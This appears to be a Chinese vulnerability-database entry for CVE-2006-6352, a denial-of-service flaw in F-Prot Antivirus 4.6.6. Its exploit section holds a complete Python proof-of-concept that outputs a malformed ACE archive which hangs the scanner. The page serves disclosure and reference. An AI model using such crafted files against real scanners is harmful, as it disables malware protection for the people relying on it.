F-PROT Antivirus畸形ACE文件处理拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111721 漏洞类型 输入验证
发布时间 2006-12-04 更新时间 2006-12-12
CVE编号 CVE-2006-6352 CNNVD-ID CNNVD-200612-117
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2892
https://www.securityfocus.com/bid/21420
https://cxsecurity.com/issue/WLB-2006120069
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-117
|漏洞详情
F-ProtAntivirus是一款UNIX平台上的杀毒软件。F-ProtAntivirus在处理特制的ACE压缩文件时会陷入死循环,远程攻击者可能利用此漏洞使F-Prot失去工作能力。
|漏洞EXP
# fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# To test this code on Linux:
#
# create ACE compressed file
# $ ./fprot1.py > 1.ace
# $ f-prot 1.ace

import sys
import struct

ACE="""
 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14
 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a
 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52
 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff
 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00
 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41
 41 41 41 41 41
"""

s = ""
for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]:
       s += i

sys.stdout.write(s)

# milw0rm.com [2006-12-04]
|受影响的产品
Gentoo app-antivirus/f-prot 4.6.6 Frisk Software F-Prot Antivirus 4.6.6 Frisk Software F-Prot Antivirus 3.16f
|参考资料

来源:XF
名称:fprot-ace-dos(30707)
链接:http://xforce.iss.net/xforce/xfdb/30707
来源:MILW0RM
名称:2892
链接:http://www.milw0rm.com/exploits/2892
来源:BID
名称:21420
链接:http://www.securityfocus.com/bid/21420
来源:BUGTRAQ
名称:20061204F-ProtAntivirusforUnix:heapoverflowandDenialofService
链接:http://www.securityfocus.com/archive/1/archive/1/453475/100/0/threaded
来源:www.f-prot.com
链接:http://www.f-prot.com/news/gen_news/061201_release_unix467.html
来源:SECTRACK
名称:1017331
链接:http://securitytracker.com/id?1017331
来源:GENTOO
名称:GLSA-200612-12
链接:http://security.gentoo.org/glsa/glsa-200612-12.xml
来源:SECUNIA
名称:23328
链接:http://secunia.com/advisories/23328
来源:MILW0RM
名称:2892
链接:http://milw0rm.com/exploits/2892
来源:FULLDISC
名称:20061204F-ProtAntivirusforUnix:heapoverflowandDenialofService
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051096.html
来源:MISC
链接:http://gleg.net/fprot.txt
来源:SREASON
名称:1998
链接:http://securityreason.com/securityalert/1998